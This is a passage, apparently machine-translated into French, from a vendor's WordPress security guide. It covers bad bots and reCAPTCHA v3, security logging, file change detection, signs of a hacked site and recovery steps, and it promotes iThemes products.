S'ils n'ont pas besoin des 24 heures complètes, vous pouvez révoquer l'augmentation des privilèges à partir de la page de profil utilisateur. Si vous avez besoin de plus de 24 heures, vous pouvez définir le nombre exact de jours dont vous avez besoin dans le champ Jours .

Emballer

La popularité de WordPress en fait une cible pour les pirates du monde entier. Comme nous en avons discuté, un attaquant peut causer des dommages en piratant même le plus bas niveau d'utilisateur de WordPress.

La bonne nouvelle est que bien qu'il n'y ait aucun moyen d'empêcher les attaques contre vos utilisateurs WordPress, avec un petit effort de notre part, nous pouvons empêcher les attaques de réussir.

Section 8 : Protégez votre site Web contre les robots malveillants

Dans cette section du guide de sécurité WordPress, vous apprendrez ce qu'est un bot et comment empêcher les mauvais bots de créer des ravages sur votre site Web.

Qu'est-ce qu'un robot ?

Un bot est un logiciel qui est programmé pour effectuer une liste spécifique de tâches. Les développeurs créent un ensemble d'instructions qu'un bot suivra automatiquement sans que le développeur ait besoin de leur dire de commencer. Les bots effectueront des tâches répétitives et banales bien plus rapidement que nous.

Divers robots explorent continuellement votre site Web. Certains de ces robots sont bons et vous fournissent un service précieux. D'autres robots ont des motivations plus néfastes. Prenons un moment pour parler de ce qu'est un bot et des différents types de bots.

Les bons robots

Robots de surveillance - iThemes Sync Pro Uptime Monitoring utilise un bot pour surveiller la disponibilité de votre site Web. Le bot vérifie votre site Web toutes les 5 minutes pour vérifier qu'il est toujours en ligne. Si votre site Web est en panne, le bot vous enverra une alerte afin que vous puissiez remettre votre site en ligne.

Robots d' audit - L'audit de site iThemes Sync Pro utilise un bot Google Lighthouse pour vérifier la qualité de vos pages Web. Un autre excellent exemple de bot d'audit est un vérificateur de liens défectueux qui parcourra votre site Web à la recherche de liens qui vous renvoient vers un emplacement qui n'existe pas.

Feeder Bots – Un excellent exemple de bot feeder est votre lecteur de podcast. Votre lecteur de podcast utilise un bot pour surveiller les flux RSS des podcasts auxquels vous êtes abonné et vous avertit lorsque votre podcast préféré sort un nouvel épisode.

Bots de moteur de recherche – Un robot d'exploration Google est un exemple de bot de moteur de recherche. Ce type de bot explorera votre site Web à la recherche de pages nouvelles ou modifiées et créera un index de votre site Web. Une fois que Google ou un autre moteur de recherche aura un index de votre site Web, ils pourront partager vos pages avec les personnes utilisant leur moteur de recherche.

Bots de sécurité - L'analyse de site iThemes Security Pro utilise un bot pour comparer la liste de vos plugins et thèmes installés avec notre base de données de vulnérabilités. Si vous avez installé un plugin ou un thème avec une vulnérabilité connue, le bot appliquera automatiquement un correctif s'il est disponible.

Les mauvais robots

Content Scraping Bots – Ces robots sont programmés pour télécharger le contenu de votre site Web sans votre permission. Le bot peut dupliquer le contenu à utiliser sur le site Web de l'attaquant pour améliorer son référencement et voler le trafic de votre site.

Spambots – Les spambots sont ennuyeux. Ils gâcheront vos commentaires avec des promesses de devenir millionnaire tout en travaillant à domicile dans l'espoir d'envoyer vos visiteurs vers des sites Web malveillants.

Brute Force Bots – Les robots Brute Force parcourent Internet à la recherche de connexions WordPress à attaquer. Une fois que ces robots atterrissent sur une page de connexion, ils essaieront la forme la plus simple d'accès à un site : en essayant de deviner les noms d'utilisateur et les mots de passe, encore et encore, jusqu'à ce qu'ils réussissent.

Comment bloquer les mauvais robots sans bloquer les bons robots : reCAPTCHA V3

Google reCAPTCHA aide à empêcher les robots malveillants de se livrer à des activités abusives sur votre site Web, telles que tenter de pénétrer dans votre site Web en utilisant des mots de passe compromis, publier du spam ou même gratter votre contenu.

Les utilisateurs légitimes, cependant, pourront se connecter, effectuer des achats, afficher des pages ou créer des comptes. reCAPTCHA utilise des techniques avancées d'analyse des risques pour distinguer les humains des robots.

La fonctionnalité Google reCAPTCHA dans iThemes Security Pro protège votre site contre les robots malveillants. Ces robots tentent de s'introduire dans votre site Web en utilisant des mots de passe compromis, en publiant du spam ou même en grattant votre contenu. reCAPTCHA utilise des techniques avancées d'analyse des risques pour distinguer les humains des robots.

Ce qui est génial avec la version 3 de reCAPTCHA, c'est qu'elle vous aide à détecter le trafic abusif des robots sur votre site Web sans aucune interaction avec l'utilisateur. Au lieu d'afficher un défi CAPTCHA, reCAPTCHA v3 surveille les différentes demandes effectuées sur votre site et renvoie un score pour chaque demande. Le score varie de 0,01 à 1. Plus le score renvoyé par reCAPTCHA est élevé, plus il est sûr qu'un humain a fait la demande. Plus ce score renvoyé par reCAPTCHA est faible, plus il est certain qu'un bot a fait la demande.

iThemes Security Pro vous permet de définir un seuil de blocage à l'aide du score reCAPTCHA. Google recommande d'utiliser 0.5 par défaut. Gardez à l'esprit que vous pourriez verrouiller par inadvertance des utilisateurs légitimes si vous définissez un seuil trop élevé.

Vous pouvez activer reCAPTCHA sur votre inscription d'utilisateur WordPress, réinitialiser le mot de passe, la connexion et les commentaires. iThemes Security Pro vous permet d'exécuter le script Google reCAPTCHA sur toutes les pages pour augmenter la précision de son score bot vs. humain.

Emballer

Il y a des bons et des mauvais robots. reCAPTCHA bloque les mauvais robots de votre site Web sans gêner les bons robots qui apportent de la valeur.

Section 9 : Journaux de sécurité WordPress

La journalisation est un élément essentiel de votre stratégie de sécurité WordPress. Une journalisation et une surveillance insuffisantes peuvent entraîner un retard dans la détection d'une faille de sécurité. La plupart des études sur les violations montrent que le temps de détection d'une violation est de plus de 200 jours ! Ce laps de temps permet à un attaquant de violer d'autres systèmes, de modifier, de voler ou de détruire davantage de données. C'est pour ces raisons qu'Insufficient Logging a atterri dans le top 10 OWASP des risques de sécurité des applications Web.

Les journaux de sécurité WordPress présentent plusieurs avantages dans votre stratégie de sécurité globale.

1. Identité et arrêt des comportements malveillants.
2. Repérez l'activité qui peut vous alerter d'une violation.
3. Évaluez combien de dégâts ont été causés.
4. Aide à la réparation d'un site piraté.

Si votre site est piraté, vous voudrez disposer des meilleures informations pour vous aider dans une enquête et une récupération rapides.

Que sont les journaux de sécurité WordPress ?

Les journaux de sécurité WordPress dans iThemes Security Pro gardent une trace des événements de sécurité importants qui se produisent sur votre site Web. Ces événements sont importants à surveiller pour indiquer si ou quand une faille de sécurité se produit.

Les journaux de sécurité de votre site Web sont un élément essentiel de toute stratégie de sécurité. Les informations trouvées dans ces enregistrements peuvent être utilisées pour verrouiller les mauvais acteurs, mettre en évidence un changement indésirable sur le site et aider à identifier et corriger le point d'entrée d'une attaque réussie.

Événements de sécurité suivis et enregistrés par iThemes Security

Voici un aperçu des événements de sécurité WordPress suivis par le plugin iThemes Security Pro.

1. WordPress Brute Force Attaques

Les attaques par force brute font référence à la méthode d'essais et d'erreurs utilisée pour découvrir les noms d'utilisateur et les mots de passe afin de pirater un site Web. WordPress ne suit aucune activité de connexion des utilisateurs, il n'y a donc rien de intégré dans WordPress pour vous protéger d'une attaque par force brute. C'est à vous de surveiller la sécurité de votre connexion pour protéger votre site WordPress.

Heureusement, une attaque par force brute n'est pas très sophistiquée et elle est assez facile à identifier dans vos journaux. Vous devrez enregistrer le nom d'utilisateur et l'adresse IP qui tentent de se connecter et si la connexion a réussi. Si vous voyez qu'un seul nom d'utilisateur ou une seule adresse IP a échoué consécutivement à des tentatives de connexion, il est probable que vous soyez victime d'une attaque par force brute.

Une fois que vous savez que votre site Web est attaqué, vous pouvez y mettre un terme ! Il est important de se rappeler qu'il n'y a aucun moyen d'empêcher une attaque de se produire sur votre site Web. Mais, en surveillant les tentatives de connexion non valides, vous pouvez empêcher ces attaques de réussir.

iThemes Security Pro est excellent pour bloquer les méchants. Cependant, si un méchant utilisait le nom d'utilisateur Bob dans une attaque par force brute et que Bob est un utilisateur réel sur le site, Bob serait malheureusement exclu avec l'attaquant.

Même s'il est agréable d'empêcher les méchants d'entrer par effraction sur un site, nous n'aimons pas que la sécurité affecte l'expérience des utilisateurs réels. Nous avons créé Magic Links pour permettre aux utilisateurs légitimes de contourner le verrouillage du nom d'utilisateur, tandis que l'attaquant par force brute reste verrouillé.

2. Analyses de logiciels malveillants

Non seulement vous devez exécuter des analyses de logiciels malveillants, mais vous devez également enregistrer les résultats de chaque analyse de logiciels malveillants dans vos journaux de sécurité WordPress. Certains journaux de sécurité n'enregistreront que les résultats d'analyse qui ont trouvé des logiciels malveillants, mais cela ne suffit pas. Il est crucial d'être alerté le plus rapidement possible d'une violation de votre site Web. Plus il vous faudra de temps pour connaître un hack, plus il fera de dégâts.

Bien qu'il soit agréable de voir l'histoire d'une approche proactive de la sécurité porter ses fruits, ce n'est qu'un bonus et non la raison d'enregistrer chaque analyse de malware.

Si vous ne documentez pas vos analyses planifiées, vous n'aurez aucun moyen de savoir s'il y a des échecs d'analyse. Si vous n'enregistrez pas les analyses ayant échoué, vous pourriez penser que votre site est contrôlé quotidiennement à la recherche de logiciels malveillants, mais, en réalité, l'analyse ne se termine pas.

Lisez l'article sur la fonctionnalité d'analyse du site pour découvrir comment iThemes Security Pro peut vous protéger de la principale cause des piratages WordPress.

3. Activité de l'utilisateur

Garder un enregistrement de l'activité des utilisateurs dans vos journaux de sécurité WordPress peut être votre grâce salvatrice après une attaque réussie.

Si vous surveillez l'activité correcte des utilisateurs, cela peut vous guider dans la chronologie d'un piratage et montrer tout ce que le pirate a changé, de l'ajout de nouveaux utilisateurs à l'ajout de publicités pharmaceutiques indésirables sur votre site.

iThemes Security Pro surveille 5 types d'activité utilisateur :

1. Connexion / Déconnexion

Le premier type d'activité d'utilisateur enregistré est lorsque les utilisateurs se connectent et se déconnectent de votre site Web et d'où. La surveillance de l'heure et de l'emplacement des connexions de l'utilisateur peut vous aider à repérer un utilisateur compromis. Cet utilisateur s'est-il connecté à un moment inhabituel ou depuis un nouvel endroit ? Si c'est le cas, vous voudrez peut-être commencer votre enquête avec eux.

2. Création d'utilisateur / Enregistrement

La prochaine activité dont vous devez garder une trace est la création d'utilisateurs, en particulier la création d'utilisateurs Administrateur. Si un pirate informatique peut compromettre un utilisateur légitime, il peut créer son propre utilisateur administrateur pour tenter de se cacher. Il est facile pour vous de remarquer quelque chose d'étrange avec votre compte, mais il est beaucoup plus difficile d'identifier une activité malveillante sur un autre utilisateur.

La surveillance de l'enregistrement des utilisateurs est également essentielle. Certaines vulnérabilités permettent aux pirates de changer le nouveau rôle d'utilisateur par défaut d'Abonné à Administrateur.

Si vous avez configuré la journalisation des utilisateurs uniquement pour surveiller l'activité des utilisateurs administrateurs, seule l'inscription des nouveaux utilisateurs administrateur sera enregistrée dans les journaux de sécurité. Ainsi, si jamais vous voyez un utilisateur nouvellement enregistré dans vos journaux de sécurité, quelque chose ne va pas.

3. Ajout et suppression de plugins

Il est essentiel de noter qui ajoute et supprime des plugins. Une fois que votre site a été piraté, il sera facile pour l'attaquant d'ajouter son plugin personnalisé pour injecter du code malveillant dans le site Web.

Même si un pirate informatique n'a pas accès à votre serveur ou à votre base de données, il peut toujours y apporter des modifications à partir de votre tableau de bord WordPress. À l'aide d'un plugin, ils peuvent ajouter des redirections vers votre site à utiliser dans leur prochaine campagne de spam ou injecter des logiciels malveillants dans votre base de données. Une fois leur code malveillant exécuté, ils peuvent alors supprimer le plugin pour supprimer les preuves de leur crime. Heureusement pour nous, nous ne manquerons rien car tout a été documenté dans nos journaux de sécurité WordPress.

4. Changer de thème

Une autre activité de l'utilisateur surveillée par la journalisation des utilisateurs d'iThemes Security Pro est lorsque quelqu'un change le thème du site Web. Si jamais vous constatez que votre thème a changé de manière inattendue, vous pouvez consulter vos journaux de sécurité WordPress pour savoir qui a effectué le changement.

5. Modifications apportées aux articles et aux pages

Enfin, vous souhaitez surveiller les modifications apportées à votre article et à vos pages. Des liens ont-ils été ajoutés pour rediriger votre trafic vers d'autres sites ? La surveillance des publications et des pages peut vous aider à trouver les pages embarrassantes ou les liens malveillants ajoutés à votre site Web après une violation.

Pour savoir quelle publication a été modifiée, cliquez sur les liens Afficher les détails pour trouver l'ID de la publication.

Consultez la publication sur la fonctionnalité de journalisation des utilisateurs pour en savoir plus sur la façon dont la surveillance de l'activité des utilisateurs peut vous aider à revenir d'un piratage.

Emballer

Une journalisation insuffisante est l'un des 10 principaux risques de sécurité des applications Web de l'OWASP. Surveiller le bon comportement vous aidera à identifier et arrêter les attaques, à détecter une violation, et à accéder et réparer les dommages causés à votre site Web après une attaque réussie.

Section 10 : Quand un désastre de sécurité WordPress survient

Même si vous suivez les meilleures pratiques de sécurité WordPress, il y a toujours une chance que votre site soit compromis. Un compromis signifie qu'un pirate a piraté votre site Web et l'a infecté par un logiciel malveillant.

Qu'est-ce qu'une violation de sécurité ?

Une atteinte à la sécurité se produit lorsqu'un cybercriminel est en mesure d'accéder sans autorisation à votre site Web ou à votre serveur. Les failles de sécurité peuvent se produire de différentes manières, car les pirates informatiques exploitent certains des problèmes de sécurité WordPress les plus courants. De l'exécution de versions obsolètes de plugins et de thèmes aux injections SQL plus compliquées, une faille de sécurité peut arriver même aux propriétaires de sites les plus vigilants.

Il est temps de détecter une faille de sécurité : un facteur clé dans le nettoyage d'un site Web infecté

Saviez-vous que le temps moyen nécessaire pour découvrir une violation de site Web est de 200 jours ? Malheureusement, plus il vous faut de temps pour remarquer une violation, plus un pirate informatique peut causer de dommages à votre site Web, à vos clients et à vous-même. Un malware peut causer des dégâts considérables en 200 jours. C'est pourquoi il est si important de réduire le temps nécessaire pour détecter une faille de sécurité.

Pourquoi? Le nettoyage et les temps d'arrêt dont vous aurez besoin pour nettoyer votre site Web après 200 jours de dommages sont également stupéfiants. Le temps pour enquêter sur tout ce que le malware a touché et quelles données du client ont été volées ne fait qu'augmenter tant que la violation n'est pas détectée. Sans parler du temps que vous devrez passer à informer les clients qu'ils doivent annuler leurs cartes de crédit parce qu'un pirate informatique a enregistré toutes leurs frappes pendant qu'ils visitaient votre site Web.

Le coût du piratage est énorme. Vous devez payer quelqu'un pour enquêter sur la violation et nettoyer votre site Web. Le spécialiste de la réparation de piratage devra fermer votre site Web pendant qu'il travaille, et les gens ne pourront pas faire de nouveaux achats pendant que votre site Web est en panne. Après avoir perdu la confiance de votre client, vous perdrez probablement tout achat futur qu'il vous aurait donné.

Le coût d'un piratage est la raison pour laquelle il est crucial de détecter une brèche le plus tôt possible. Plus vite vous découvrez la violation, plus vite vous pouvez empêcher tout dommage supplémentaire, et plus vite vous pouvez remettre votre site Web et votre entreprise en ligne.

Les scanners de logiciels malveillants sont-ils suffisants ?

Les scanners de logiciels malveillants offrent un moyen d'analyser votre site Web WordPress à la recherche de fichiers et de scripts malveillants connus. Mais les scanners de logiciels malveillants sont-ils suffisants pour détecter une faille de sécurité ?

En un mot, non. Ne pensez pas que vous pouvez vous fier uniquement à un scanner de logiciels malveillants pour vérifier si votre site Web est infecté. Aucun scanner de malware ne peut identifier chaque malware existant. Si vous rencontrez un scanner de logiciels malveillants qui prétend qu'il est précis à 100%, vous devriez l'exécuter car les analyses qui font de telles déclarations sont souvent les moins précises.

Détection de logiciels malveillants par signature ou comportementale

La majorité des analyses de logiciels malveillants et des logiciels antivirus utilisent des signatures de logiciels malveillants pour détecter les logiciels malveillants. Des analyses de logiciels malveillants plus avancées utiliseront une combinaison de détection de signature et d'analyse comportementale.

Signatures de logiciels malveillants

Une signature de malware est une série d'octets qui sont utilisés pour identifier des malwares connus. Certains scanners de logiciels malveillants sont alimentés par une base de données contenant les signatures de logiciels malveillants de millions de virus connus.

L'analyse des logiciels malveillants basée sur les signatures est rapide, simple et détectera 100 % des logiciels malveillants connus et bien compris. Tout cela est génial et attrapera les logiciels malveillants ajoutés par des pirates informatiques de bas niveau.

Cependant, les pirates informatiques qualifiés savent que les scanners de logiciels malveillants recherchent les signatures de logiciels malveillants connus. Ces pirates ont la capacité d'obscurcir les signatures de logiciels malveillants pour ne pas être détectés par votre scanner moyen.

De nouveaux logiciels malveillants sont publiés à un rythme tel que les scanners de logiciels malveillants ne peuvent pas maintenir leur base de données à jour avec toutes les dernières signatures. Ainsi, un scanner basé sur les signatures ne sera pas en mesure de faire la différence entre un nouveau malware et le fichier readme.txt d'un plugin.

Analyse comportementale

L'analyse comportementale vérifie les actions d'un logiciel pour déterminer s'il est malveillant. Il existe une tonne de types de comportements différents qui peuvent être considérés comme suspects ou malveillants. Par exemple, l'analyse de site iThemes Security Pro exploite l'API de navigation sécurisée de Google pour assurer la sécurité des sites Web. La navigation sécurisée de Google vérifiera si un logiciel redirige le trafic vers un site malveillant connu.

Encore une fois, il n'existe pas de méthode infaillible de détection des logiciels malveillants. Mais une combinaison de vérifications comportementales et de signature augmentera considérablement vos chances d'être alerté des preuves d'une violation de la sécurité.

Quel comportement tous les logiciels malveillants partagent-ils ?

Nous savons à quel point il est crucial de détecter une faille de sécurité le plus tôt possible, et qu'il ne suffit pas de se fier uniquement à la détection de logiciels malveillants. Nous nous sommes donc demandé comment iThemes Security Pro pouvait réduire le temps nécessaire aux utilisateurs pour détecter les failles de sécurité sur leurs sites Web ?

Bien que le type de dommages causés par les logiciels malveillants sur votre site Web varie considérablement, ce qu'il fait peut se résumer à un ou à une combinaison des trois éléments suivants.

1. Ajouter des fichiers – Un logiciel malveillant sous forme de logiciel espion peut ajouter un fichier malveillant qui enregistrera les frappes de votre client lorsqu'il entrera les informations de sa carte de crédit.
2. Supprimer des fichiers – Certains logiciels malveillants suppriment un fichier légitime et le remplacent par un fichier malveillant du même nom.
3. Modifier les fichiers – Un logiciel malveillant essaiera de cacher son code malveillant en le cachant dans un fichier existant qu'il modifie.

Ne serait-il pas agréable d'être alerté des modifications inattendues de votre site Web afin de pouvoir les inspecter à la recherche de signes d'une faille de sécurité ?

Comment réduire le temps nécessaire pour détecter une violation de sécurité

La clé pour détecter rapidement une faille de sécurité consiste à surveiller les modifications apportées aux fichiers sur votre site Web.

La fonction de détection des modifications de fichiers dans iThemes Security Pro analysera les fichiers de votre site Web et vous alertera lorsque des modifications se produisent sur votre site Web.

Il existe plusieurs raisons légitimes pour lesquelles vous verriez de nouvelles activités de modification de fichiers dans vos journaux, mais si les modifications apportées étaient inattendues, vous devez prendre le temps de vous assurer que les modifications ne sont pas malveillantes. Par exemple, si vous voyez une modification apportée à un plugin à la même date et heure que vous avez mis à jour le plugin, il n'y aurait aucune raison d'enquêter.

Comment activer la détection des modifications de fichiers dans iThemes Security Pro

Pour commencer à surveiller les modifications apportées aux fichiers , activez la détection des modifications de fichiers sur la page principale des paramètres de sécurité.

Une fois la détection des modifications de fichiers activée, iThemes Security Pro commencera à analyser tous les fichiers de votre site Web en morceaux . L'analyse de vos fichiers en morceaux aidera à réduire les ressources nécessaires pour surveiller les modifications apportées aux fichiers.

L'analyse initiale des modifications de fichiers créera un index des fichiers de votre site Web et de leurs hachages de fichiers. Un hachage de fichier est une version abrégée et non lisible du contenu du fichier.

Une fois l'analyse initiale terminée, iThemes Security Pro continuera à analyser votre fichier par morceaux. Si un hachage de fichier change lors de l'une des analyses suivantes, cela signifie que le contenu du fichier a changé.

Vous pouvez également exécuter une modification de fichier manuelle en cliquant sur le bouton Analyser les fichiers maintenant dans les paramètres de détection de modification de fichier

Activation des e-mails de notification de modification de fichier

Les modifications de fichiers se produisent tout le temps, et recevoir une alerte par e-mail pour chaque modification deviendrait rapidement écrasante. Et avant que vous ne le sachiez, cela devient une situation de garçon qui a crié au loup, et vous commencez à ignorer complètement les alertes de changement de fichier.

Voyons comment iThemes Security Pro identifie intelligemment les modifications légitimées pour réduire les notifications et comment vous pouvez désactiver les notifications pour les fichiers qui devraient être mis à jour fréquemment.

Vous pouvez gérer toutes vos notifications de sécurité iThemes à partir du centre de notifications dans le plug-in iThemes Security. Depuis votre tableau de bord d'administration WordPress, accédez à Sécurité > Paramètres et localisez le module Centre de notifications .

Comment iThemes Security Pro identifie les modifications de fichiers légitimes

iThemes Security Pro peut détecter de plusieurs manières si une modification apportée à un fichier était légitime et non préoccupante. iThemes Security Pro ne créera pas de notification de modification de fichier pour les modifications qu'il peut vérifier.

1. Mises à jour des plugins/thèmes complétées par la gestion des versions

La fonction de gestion des versions d'iThemes Security Pro vous permet de mettre à jour automatiquement WordPress, les plugins et les thèmes.

Si une mise à jour est effectuée par Version Management, iThemes Security Pro connaîtra la source de la mise à jour et ne déclenchera pas d'alerte.

2. Comparaison de fichiers pour les plugins et thèmes iThemes

Cochez la case Comparer les fichiers en ligne dans les paramètres de détection de modification de fichier pour activer la comparaison de fichiers en ligne.

Chaque fois qu'un fichier sur votre site Web appartenant à un plugin ou à un thème iThemes est modifié, il sera comparé à un fichier sur le serveur iThemes. Si le hachage de la version du fichier sur votre site Web correspond au hachage de la version sur le serveur iThemes, il s'agira d'un changement légitime et vous ne recevrez pas d'alerte.

3. Comparaison de fichiers en ligne WordPress.org

Si un fichier de base WordPress ou un plugin installé à partir du référentiel WordPress.org est modifié, le fichier sera comparé à la version sur WordPress.org. Si les hachages correspondent, les modifications ne sont pas malveillantes et vous ne recevrez pas d'alerte.

4. Exclusions manuelles

Vous pouvez exclure des fichiers, des répertoires et des types de fichiers de la détection des modifications de fichiers dans les paramètres de détection des modifications de fichiers.

La règle générale est que vous pouvez exclure les fichiers dont vous savez qu'ils seront régulièrement mis à jour. Les fichiers de sauvegarde et de cache en sont un parfait exemple. L'exclusion de ces types de fichiers calmera une grande partie du bruit supplémentaire.

7 signes que votre site WordPress a été piraté

Vous vous demandez : « Mon site WordPress est-il piraté ? " signifie que vous aurez besoin de réponses rapides.

Plus vite vous remarquerez les signes d'une violation de site Web, plus vite vous pourrez nettoyer votre site. Plus vite vous pouvez nettoyer votre site Web, moins le piratage peut causer de dommages à votre site Web.

1. Votre page d'accueil est différente

Les modifications apportées à votre page d'accueil semblent être un signe évident. Mais combien de fois effectuez-vous une vérification approfondie de votre page d'accueil ? Je sais que je vais généralement directement à mon URL de connexion et non à mon URL d'accueil. De là, je me connecte, mets à jour mon site ou modifie un article. Après avoir terminé ce que je suis venu faire, je pars souvent sans regarder la page d'accueil de mon site Web.

L'objectif principal de certains hacks est de troller un site Web ou de gagner en notoriété. Ainsi, ils ne changent votre page d'accueil que pour quelque chose qu'ils trouvent amusant ou pour laisser une carte d'appel piratée .

Si vous remarquez un changement sur votre page d'accueil, vous pouvez restaurer votre site Web rapidement et facilement à l'aide d'un fichier de sauvegarde créé avec un plugin de sauvegarde WordPress de confiance tel que BackupBuddy.

2. Les performances de votre site Web ont chuté

Votre site peut sembler lent en cas d'infection. Vous pouvez rencontrer des ralentissements sur votre site Web si vous subissez des attaques par force brute ou s'il existe un script malveillant utilisant les ressources de votre serveur pour l'extraction de crypto-monnaie. De même, une attaque DDoS (ou déni de service ) se produit lorsqu'un réseau d'adresses IP envoie simultanément des requêtes à votre site Web pour tenter de le faire planter.

3. Votre site Web contient des publicités malveillantes ou des popups de spam

Il y a de fortes chances qu'un pirate informatique ait compromis votre site Web si vos visiteurs voient des fenêtres contextuelles qui les redirigent vers un site Web malveillant. L'objectif de ce type d'attaque est de détourner le trafic de votre site vers le site de l'attaquant afin qu'il puisse cibler les utilisateurs avec une fraude au clic pour la publicité Pay Per Click.

La chose la plus frustrante à propos de ce type de hack est que vous ne pourrez peut-être pas voir les popups. Un piratage contextuel peut être conçu pour ne pas s'afficher pour les utilisateurs connectés, ce qui réduit les chances que les propriétaires de sites Web les voient. Ainsi, même lorsque le propriétaire du site se déconnecte, les fenêtres contextuelles ne s'affichent jamais.

Votre vue des popups peut également être limitée si vous utilisez une extension de bloqueur de publicités dans votre navigateur. Par exemple, un client a signalé un piratage de popup et a partagé des captures d'écran et une vidéo des popups. Après avoir passé des heures à parcourir leur site Web, je n'ai pas pu recréer quoi que ce soit qu'ils rapportaient. J'étais convaincu que leur ordinateur personnel avait été piraté et non le site Web.

Enfin, j'ai compris pourquoi je n'étais pas capable de voir les popups. J'avais installé une extension adblocker sur mon navigateur. Dès que j'ai désactivé l'extension du bloqueur de publicités, j'ai pu voir des popups partout. Je partage cette histoire embarrassante pour vous éviter de retomber dans la même erreur, espérons-le.

4. Vous remarquez une diminution du trafic sur le site Web

Si vous vous connectez à votre compte Google Analytics et que vous constatez une forte baisse du trafic sur votre site Web, votre site WordPress pourrait être piraté. Une baisse du trafic du site mérite une enquête. Il pourrait y avoir un script malveillant sur votre site qui redirige les visiteurs loin de votre site ou Google pourrait déjà mettre votre site Web sur liste noire en tant que site malveillant.

La première chose que vous voulez rechercher est le trafic sortant de votre site Web. En suivant votre site Web avec Google Analytics, vous devrez configurer votre site pour suivre le trafic quittant votre site. Le moyen le plus simple de surveiller le trafic sortant sur votre site WordPress est d'utiliser un plugin WordPress Google Analytics.

6. Nouveaux utilisateurs inattendus

Si votre site Web a des enregistrements inattendus de nouveaux utilisateurs administrateurs, c'est un autre signe que votre site WordPress a été piraté. Grâce à un exploit d'un utilisateur compromis, un attaquant peut créer un nouvel utilisateur admin. Avec leurs nouveaux privilèges d'administrateur, le pirate est prêt à causer des dommages majeurs à votre site.

Vous vous souvenez du plug-in WP GDPR Compliance précédent ? En novembre 2018, nous avons eu plusieurs rapports sur la création de nouveaux utilisateurs administrateurs sur les sites Web des clients. Les pirates ont utilisé une vulnérabilité dans le plugin WP GDPR Compliance (vulnérabilité corrigée dans la version 1.4.3) pour créer de nouveaux utilisateurs administrateurs sur les sites WordPress exécutant le plugin. L'exploit du plugin a permis aux utilisateurs non autorisés de modifier l'enregistrement de l'utilisateur pour changer le rôle par défaut du nouvel utilisateur d'abonné à administrateur. Malheureusement, ce n'était pas la seule vulnérabilité et vous ne pouvez pas simplement supprimer les nouveaux utilisateurs créés par l'attaquant et corriger le plugin.

Si vous aviez installé WP GDPR Compliance et WooCommerce, votre site pourrait avoir été injecté avec du code malveillant. Les attaquants pourraient utiliser le programme d'installation en arrière-plan du plug-in WooCommerce pour insérer un programme d'installation de porte dérobée dans la base de données. Si votre site a une porte dérobée installée, vous devez contacter un spécialiste de la réparation de piratage. Une autre option consiste à utiliser un fichier de sauvegarde pour revenir à une copie de votre site Web avant la violation à l'aide d'une sauvegarde précédente.

7. Utilisateurs administrateurs supprimés

Si vous ne parvenez pas à vous connecter à votre site WordPress, même après une réinitialisation de mot de passe, cela peut être un signe sérieux d'infection.

Lorsque le référentiel Gentoo Github a été piraté, la première chose que l'attaquant a faite a été de supprimer tous les utilisateurs administrateurs. Alors, comment ce hacker a-t-il même pu accéder à son compte Github ? Le mot de passe d'un utilisateur administrateur Gentoo a été découvert sur un autre site. Je suppose que le nom d'utilisateur et le mot de passe ont été découverts soit par grattage, soit par un vidage de la base de données.

Même si le mot de passe de l'administrateur pour son compte Gentoo Github était différent de celui utilisé sur le compte compromis, il était très similaire. Ce serait donc comme si j'utilisais iAmAwesome2020 comme mot de passe sur un compte et iAmAwesome2021 sur un autre site. Ainsi, les pirates ont pu découvrir le mot de passe avec un petit effort. Comme nous pouvons le voir, vous devez utiliser un mot de passe unique pour chaque compte. Une simple variation de vos mots de passe ne suffit pas. En utilisant LastPass, vous pouvez générer et stocker en toute sécurité des mots de passe forts et uniques pour chaque site.

Comment revenir d'une catastrophe

Si vous soupçonnez qu'une violation s'est produite, vous pouvez prendre quelques mesures rapides pour atténuer les dommages.

Restaurer vers une sauvegarde précédente/propre de votre site

Le moyen le plus sûr d'annuler une faille de sécurité consiste à restaurer votre site à une version précédente, avant l'attaque. C'est pourquoi il est si important d'avoir une solution de sauvegarde WordPress complète en place. Nous vous recommandons d'utiliser BackupBuddy pour planifier les sauvegardes à exécuter automatiquement afin que vous ayez toujours une sauvegarde.

Notez simplement que la restauration d'une sauvegarde précédente peut toujours laisser votre site vulnérable à la même violation, il est donc important de suivre également ces étapes.

Mettez à jour immédiatement tous les plugins et thèmes obsolètes

Un plugin ou un thème vulnérable peut toujours être le coupable, il est donc important de mettre à jour IMMÉDIATEMENT tous les plugins ou thèmes obsolètes. Même si vous restaurez une version précédente propre de votre site Web, les mêmes vulnérabilités existeront toujours et pourront être à nouveau piratées.

Vous pouvez également vérifier que vous n'exécutez pas un plugin ou un thème vulnérable qui est toujours sans correctif du développeur. Vous devrez supprimer ce plugin immédiatement.

Activer l'authentification à deux facteurs

Si vous n'utilisez pas l'authentification à deux facteurs pour sécuriser les connexions administrateur, activez-la immédiatement. Cette couche de sécurité supplémentaire permettra de s'assurer que les utilisateurs non autorisés ne peuvent pirater aucun compte administrateur.

Demander de l'aide pour la suppression professionnelle des logiciels malveillants

Les failles de sécurité WordPress se produisent au niveau du serveur (plus profond que votre installation WordPress), vous devrez donc peut-être contacter un service professionnel de suppression de logiciels malveillants. Nous recommandons WeWatchYourWebsite pour une suppression professionnelle des logiciels malveillants.

Conclusion : Guide ultime de la sécurité WordPress

Dans ce guide de sécurité WordPress, nous avons couvert BEAUCOUP ! Mais, en suivant les conseils de ce guide, vous bloquerez près de 100 % des attaques perpétrées sur votre site Web.

Un plugin de sécurité WordPress peut aider à sécuriser votre site Web WordPress

Associé à la connaissance des sujets de sécurité WordPress de ce guide, un plugin de sécurité WordPress peut vous aider à sécuriser votre site Web WordPress. iThemes Security Pro, notre plugin de sécurité WordPress, offre plus de 50 façons de sécuriser et de protéger votre site Web contre les vulnérabilités de sécurité WordPress courantes. Avec WordPress, l'authentification à deux facteurs, la protection contre la force brute, l'application stricte des mots de passe et plus encore, vous pouvez ajouter une couche de sécurité supplémentaire à votre site Web.

Michael Moore

Chaque semaine, Michael rédige le rapport de vulnérabilité WordPress pour vous aider à protéger vos sites. En tant que chef de produit chez iThemes, il nous aide à continuer à améliorer la gamme de produits iThemes. C'est un nerd géant et il adore apprendre tout ce qui touche à la technologie, ancienne et nouvelle. Vous pouvez trouver Michael traîner avec sa femme et sa fille, lire ou écouter de la musique lorsqu'il ne travaille pas.